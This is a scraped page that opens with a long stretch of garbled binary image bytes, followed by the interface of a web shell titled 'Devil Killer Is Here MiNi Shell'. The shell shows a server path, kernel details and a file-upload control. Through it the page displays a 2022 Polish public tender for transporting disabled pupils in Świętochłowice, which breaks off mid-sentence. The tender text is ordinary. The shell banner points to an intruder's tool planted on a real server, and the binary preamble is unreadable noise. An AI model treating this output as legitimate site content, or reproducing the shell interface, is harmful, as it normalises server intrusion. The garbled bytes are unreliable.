JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220613/0020649101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów niepełnosprawnych ze Świętochłowic wraz z opieką do placówek oświatowych i OREW-ów znajdujących się na terenie Świętochłowic oraz poza jego granicami w roku szkolnym 2022/2023. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zarząd Oświaty w Świętochłowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 361677929</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bytomska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świętochłowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48322453129</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzo@mzo.swietochlowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzo.swietochlowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów niepełnosprawnych ze Świętochłowic wraz z opieką do placówek oświatowych i OREW-ów znajdujących się na terenie Świętochłowic oraz poza jego granicami w roku szkolnym 2022/2023. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-21f53234-eaff-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00206491</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-21f53234-eaff-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Zamawiający dopuszcza porozumiewanie się z Wykonawcami drogą elektroniczną. Strona internetowa, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postepowaniem o udzielenie zamówienia: <br/>http://bip-slaskie.pl/mzoswietochlowice/. <br/>Adres strony internetowej Zamawiającego: <br/>www.mzo.swietochlowice.pl. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Strona internetowa, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postepowaniem o udzielenie zamówienia: <br/>http://bip-slaskie.pl/mzoswietochlowice/. <br/>Adres strony internetowej Zamawiającego: <br/>www.mzo.swietochlowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oświadczenia, wnioski, zawiadomienia oraz informacje Wykonawcy przekazują pisemnie na adres poczty elektronicznej Zamawiającego: mzo@mzo.swietochlowice.pl powołując się na nazwę zamówienia.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 RODO oraz art. 19 ustawy 11 września 2019r. – Prawo zamówień publicznych informujemy:<br/>1.	Administratorem Państwa danych osobowych jest Miejski Zarząd Oświaty z siedzibą w Świętochłowicach przy ul. Bytomskiej 8.<br/>2.	Inspektorem ochrony danych wyznaczonym przez Administratora jest Pan Tobiasz Brachaczek, z którym kontaktować można się poprzez adres e-mail: iod@mamrodo.pl lub telefonicznie: 32 438 68 06.<br/>3.	Państwa dane osobowe przetwarzane będą w celu rozpatrzenia złożonych ofert w związku z prowadzeniem przetargu na dowóz dzieci do placówek oświatowych. Podstawą przetwarza-nia Państwa danych osobowych jest działanie przed zawarciem umowy oraz realizacja obo-wiązku prawnego (art. 6 ust. 1 lit. b, c RODO). Podstawą prawną przetwarzania Państwa da-nych są przepisy ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych w związku z realizacją art. 32 pkt 5,6 oraz art. 39 pkt 2,3,4 i 5 ustawy z dnia 14.12.2016r. Prawo oświato-we. <br/>W przypadku zawarcia umowy dane będą przetwarzane w celu jej realizacji zgodnie z obowiązującymi przepisami prawa (art. 6 ust. 1 lit. b, c RODO) oraz ustalenia, obrony lub dochodzenia ewentualnych roszczeń co stanowi prawnie uzasadniony interes Administratora (art. 6 ust. 1 lit. f RODO).<br/>4.	Państwa dane osobowe będą przetwarzane przez okres nie dłuższy niż jest to niezbędne w celu rozpatrzenia złożonych ofert, po tym czasie zgodnie z art. 87 ustawy Prawo zamówień publicz-nych przez 4 lata. W przypadku zawarcia umowy przez okres obowiązywania umowy, a po tym czasie przez okres wymagany przepisami szczegółowymi.<br/>5.	Przysługuje Państwu prawo do:<br/>1)	żądania od Administratora dostępu do swoich danych osobowych, <br/>2)	ich sprostowania (poprawiania), które nie może naruszać integralności protokołu oraz jego załączników; nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z usta-wą.<br/>3)	usunięcia<br/>4)	ograniczenia przetwarzania danych osobowych, które nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>5)	wniesienia sprzeciwu wobec takiego przetwarzania.<br/>6.	Mają Państwo prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, iż przetwarzanie danych osobowych Państwa dotyczących narusza przepisy Ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016.<br/>7.	Podanie przez Państwa danych osobowych jest wymogiem ustawowym, a konsekwencją nie podanie danych będzie brak możliwości rozpatrzenia Państwa oferty.<br/>8.	Dostęp do Państwa danych będą mieli upoważnieni pracownicy administratora w ramach wy-konywania swoich obowiązków służbowych, podmioty uprawnione na podstawie przepisów prawa oraz podmioty przetwarzające na podstawie polecenia administratora. Zgodnie z art. 18 ustawy Prawo zamówień publicznych postępowanie o udzielenie zamówienia jest jawne.<br/>9.	Państwa dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym pro-filowaniu i nie będą przekazywane do państwa trzeciego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZO.271.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 873316,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Transport 60 dzieci i uczniów (orientacyjna liczba dzieci i uczniów przewidywana przez Zamawiającego) zaplanowany do następujących placówek oświatowych na terenie Miasta Świętochłowic:<br/>–	Przedszkole Miejskie Nr 8, ul. Zubrzyckiego 10,<br/>–	Przedszkole Miejskie Nr 9, ul. Sportowa 6,<br/>–	Przedszkole Miejskie Nr 12, ul. Harcerska 10,<br/>–	Terapeutyczny Punkt Przedszkolny „Kolorado” ul. Górna 6,<br/>–	Terapeutyczny Punkt Przedszkolny „Kolorado” ul. Karpacka 33,<br/>–	Terapeutyczny Punkt Przedszkolny „Kolorado” ul. Wiślan 9,<br/>–	Szkoła Podstawowa Nr 10, ul. Łagiewnicka 65,<br/>–	Szkoła Podstawowa Nr 17, ul. Armii Krajowej 14,<br/>–	Zespół Szkół Ogólnokształcących, ul. Sudecka 5,<br/>–	Zespól Edukacji Wspomagającej, ul. Wojska Polskiego 75.<br/>Miejscem dowozu może zostać inna szkoła lub placówka na terenie Miasta Świętochłowice.<br/>Przed rozpoczęciem roku szkolnego Zamawiający opracuje i przekaże Wykonawcy listę dzieci i uczniów wraz z ich adresami zamieszkania oraz adresami placówek oświatowych, do których będzie organizowany dowóz. Na podstawie listy Wykonawca opracuje harmonogramy dowozu, które przedstawi rodzicom/opiekunom dzieci i uczniów a kopie przedłoży w siedzibie Miejskiego Zarządu Oświaty w Świętochłowicach, przy ul. Bytomskiej 8, do dnia 30 października 2022 roku. Zamawiający zastrzega sobie możliwość zmiany wykazu placówek oświatowych i ośrodków rehabilitacyjno-wychowawczych, do których organizowany będzie dowóz. Dla obu części zamówienia Zamawiający wymaga aby Wykonawca zatrudnił osobę do pełnienia funkcji opiekuna przeszkolonego w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej, którego obowiązkiem będzie w szczególności: <br/>- zapewnienie bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dzieci i uczniów dowożonych do placówek, do których organizowany będzie dowóz,<br/>- zapewnienie bezpieczeństwa w trakcie przewozu dzieci i uczniów do placówek, do których organizowany będzie dowóz,<br/>- opieka i zwracanie uwagi na właściwe zachowanie się dzieci i uczniów w czasie przejazdu,<br/>- w drodze powrotnej przekazanie dziecka lub ucznia oczekującemu opiekunowi,<br/>- ustalanie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>- w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu dzieci i uczniów nie dopuszczenie do ich wsiadania do pojazdu lub wysiadania z pojazdu.<br/>Dla obu części zamówienia Wykonawca opracowując harmonogramy dowozu dzieci powinien uwzględnić zasady organizacji bezpłatnego transportu zbiorowego, który zapewnia uczniom niepełnosprawnym Gmina Świętochłowice, a które określa Zarządzenie nr 226/2021 Prezydenta Miasta z dnia 14 maja 2021 roku, w szczególności:<br/>- przybliżone godziny przewozów (z dokładnością do 15 minut) do placówki i odbioru, uzgodnione po podaniu przez placówki planu zajęć i mogą ulec zmianom w trakcie roku szkolnego,<br/>- w przypadku organizacji przewozu do danej jednostki oświatowej dla dwóch i więcej uczniów, dowiezienie wszystkich uprawnionych do przewozu dzieci na zajęcia rozpoczynające się najwcześniej oraz odbiór z zajęć kończących się najpóźniej,<br/>- miejsce odbioru dziecka powinno znajdować się przy drodze ogólnodostępnej, jak najbliżej wejścia do budynku miejsca zamieszkania dziecka,<br/>- w przypadku, kiedy odbiór dziecka przed budynkiem zamieszkania nie jest możliwy ze względu na utrudniony dojazd lub inne zagrożenia bezpieczeństwa dziecka, przewoźnik ustala z rodzicem lub prawnym opiekunem dziecka inny punkt zapewniający bezpieczny odbiór,<br/>- w dniu przewozu rodzic lub opiekun prawny zostaje powiadomiony telefonicznie (rozmowa lub sms) przez przewoźnika o dokładnym miejscu i godzinie odbioru oraz powrotu dziecka,<br/>- czas oczekiwania na dziecko przez przewoźnika wynosi maksymalnie 3 minuty,<br/>- za szkody spowodowane przez dzieci podczas transportu odpowiadają rodzice. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje organizację dowozu do ośrodków rehabilitacyjno- wychowawczych oraz przedszkoli w okresie wolnym od zajęć dydaktycznych w placówkach oświatowych, tj. przez 10 dni ferii zimowych oraz 49 dni wakacji letnich. W przypadku zgłoszenia przez rodziców/opiekunów prawnych dodatkowych wniosków o dowóz dziecka niepełnosprawnego do placówki oświatowej bądź ośrodka rehabilitacyjno- edukacyjno- wychowawczego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">norma emisji spalin EURO (środowiskowa)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Transport 40 dzieci i uczniów (orientacyjna liczba dzieci i uczniów przewidywana przez Zamawiającego) zaplanowany do placówek oświatowych i ośrodków rehabilitacyjno-wychowawczych poza teren Miasta Świętochłowice:<br/><br/>1. Miasto Katowice <br/>–	Bajkowe Przedszkole, ul. Modrzewiowa 30,<br/>–	Szkoła Podstawowa nr 58 z Oddziałami Integracyjnymi im. Marii Dąbrowskiej,<br/> al. Krzywoustego 11,<br/>–	Szkoła Podstawowa nr 59 im. J. Matejki, ul. Chrobrego 5,<br/>–	Szkoła Podstawowa nr 60 im. Marii Grzegorzewskiej Specjalna, ul. Chrobrego 4<br/>–	Szkoła Podstawowa nr 61 im. Polskich Kawalerów Maltańskich Specjalna, <br/>ul. Kołobrzeska 8,<br/>–	Zespół Szkolno- Przedszkolny dla Dzieci Niesłyszących i Słabo Słyszących, <br/>ul. M. Grażyńskiego 17,<br/>–	Zespól Szkół Specjalnych Nr 6, ul. Rolna 22.<br/>2. Miasto Chorzów <br/>–	Szkoła Podstawowa Specjalna nr 33 im. Jana Brzechwy z Oddziałami Przyszpitalnymi, <br/>ul. Dyrekcyjna 3<br/>–	„Niebieski Zakątek”, ul. Opolska 21,<br/>–	„Niebieski Zakątek”, ul. P. Skargi 34 M,<br/>–	„Niebieski Zakątek”, ul. Wesoła 24,<br/>–	II Liceum Ogólnokształcące im. Juliusz Ligonia, ul. 3 Maja 22,<br/>–	Ośrodek Rehabilitacyjno- Edukacyjno- Wychowawczy, ul. Czysta 7,<br/>–	Specjalistyczny Ośrodek Szkolno- Wychowawczy dla Młodzieży Niewidomej i Słabowidzącej, ul. Hajducka 22.<br/>3. Miasto Dąbrowa Górnicza <br/>–	Specjalistyczny Ośrodek Szkolno- Wychowawczy Dla Dzieci Słabo Widzących i Niewidomych, ul. Swobodna 59.<br/>4. Miasto Zabrze <br/>–	Centrum Edukacji i Rehabilitacji w Zabrzu, ul. Jerzego Wyciska 5.<br/>5. Miasto Bytom <br/>–	Szkoła Podstawowa Specjalna nr 2 w Bytomiu, ul. Arki Bożka 21,<br/>–	Ośrodek Rehabilitacyjno- Edukacyjno- Wychowawczy, ul. Stanisława Małachowskiego 36.<br/>6. Miasto Ruda Śląska<br/>–	Szkoła Podstawowa nr 13 im. Alfreda Szklarskiego w Rudzie Śląskiej, <br/>ul. Ks. Józefa Niedzieli 61,<br/>–	Szkoła Podstawowa nr 12 Specjalna im. Św. Łukasza w Rudzie Śląskiej, <br/>ul. Sygietyńskiego 6.<br/>Przed rozpoczęciem roku szkolnego Zamawiający opracuje i przekaże Wykonawcy listę dzieci i uczniów wraz z ich adresami zamieszkania oraz adresami placówek oświatowych i ośrodków rehabilitacyjno- wychowawczych, do których będzie organizowany dowóz. Na podstawie listy Wykonawca opracuje harmonogramy dowozów, które przedstawi rodzicom bądź opiekunom dzieci i uczniów a kopie przedłoży w siedzibie Miejskiego Zarządu Oświaty w Świętochłowicach, przy ul. Bytomskiej 8, do dnia 30 października 2022 roku. Zamawiający zastrzega sobie możliwość zmiany wykazu placówek oświatowych i ośrodków rehabilitacyjno-wychowawczych, do których organizowany będzie dowóz. Dla obu części zamówienia Zamawiający wymaga aby Wykonawca zatrudnił osobę do pełnienia funkcji opiekuna przeszkolonego w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej, którego obowiązkiem będzie w szczególności: <br/>- zapewnienie bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dzieci i uczniów dowożonych do placówek, do których organizowany będzie dowóz,<br/>- zapewnienie bezpieczeństwa w trakcie przewozu dzieci i uczniów do placówek, do których organizowany będzie dowóz,<br/>- opieka i zwracanie uwagi na właściwe zachowanie się dzieci i uczniów w czasie przejazdu,<br/>- w drodze powrotnej przekazanie dziecka lub ucznia oczekującemu opiekunowi,<br/>- ustalanie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>- w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu dzieci i uczniów nie dopuszczenie do ich wsiadania do pojazdu lub wysiadania z pojazdu.<br/>Dla obu części zamówienia Wykonawca opracowując harmonogramy dowozu dzieci powinien uwzględnić zasady organizacji bezpłatnego transportu zbiorowego, który zapewnia uczniom niepełnosprawnym Gmina Świętochłowice, a które określa Zarządzenie nr 226/2021 Prezydenta Miasta z dnia 14 maja 2021 roku, w szczególności:<br/>- przybliżone godziny przewozów (z dokładnością do 15 minut) do placówki i odbioru, uzgodnione po podaniu przez placówki planu zajęć i mogą ulec zmianom w trakcie roku szkolnego,<br/>- w przypadku organizacji przewozu do danej jednostki oświatowej dla dwóch i więcej uczniów, dowiezienie wszystkich uprawnionych do przewozu dzieci na zajęcia rozpoczynające się najwcześniej oraz odbiór z zajęć kończących się najpóźniej,<br/>- miejsce odbioru dziecka powinno znajdować się przy drodze ogólnodostępnej, jak najbliżej wejścia do budynku miejsca zamieszkania dziecka,<br/>- w przypadku, kiedy odbiór dziecka przed budynkiem zamieszkania nie jest możliwy ze względu na utrudniony dojazd lub inne zagrożenia bezpieczeństwa dziecka, przewoźnik ustala z rodzicem lub prawnym opiekunem dziecka inny punkt zapewniający bezpieczny odbiór,<br/>- w dniu przewozu rodzic lub opiekun prawny zostaje powiadomiony telefonicznie (rozmowa lub sms) przez przewoźnika o dokładnym miejscu i godzinie odbioru oraz powrotu dziecka,<br/>- czas oczekiwania na dziecko przez przewoźnika wynosi maksymalnie 3 minuty,<br/>- za szkody spowodowane przez dzieci podczas transportu odpowiadają rodzice.<br/>Ponadto Zamawiający dla tras dowozu dzieci do:<br/>–	Ośrodka Rehabilitacyjno- Edukacyjno- Wychowawczego w Chorzowie przy ul. Czystej 7,<br/>–	Centrum Edukacji i Rehabilitacji w Zabrzu przy ul. J. Wyciska 5,<br/>–	Ośrodka Rehabilitacyjno- Edukacyjno- Wychowawczego w Bytomiu przy ul. Stanisława Małachowskiego 36,<br/>–	Specjalistycznego Ośrodka Szkolno- Wychowawczego Dla Dzieci Słabo Widzących i Niewidomych w Dąbrowie Górniczej przy ul. Swobodnej 59,<br/>–	Specjalistycznego Ośrodka Szkolno- Wychowawczego dla Młodzieży Niewidomej i Słabowidzącej w Chorzowie przy ul. Hajducka 22.<br/>wymaga zatrudnienia 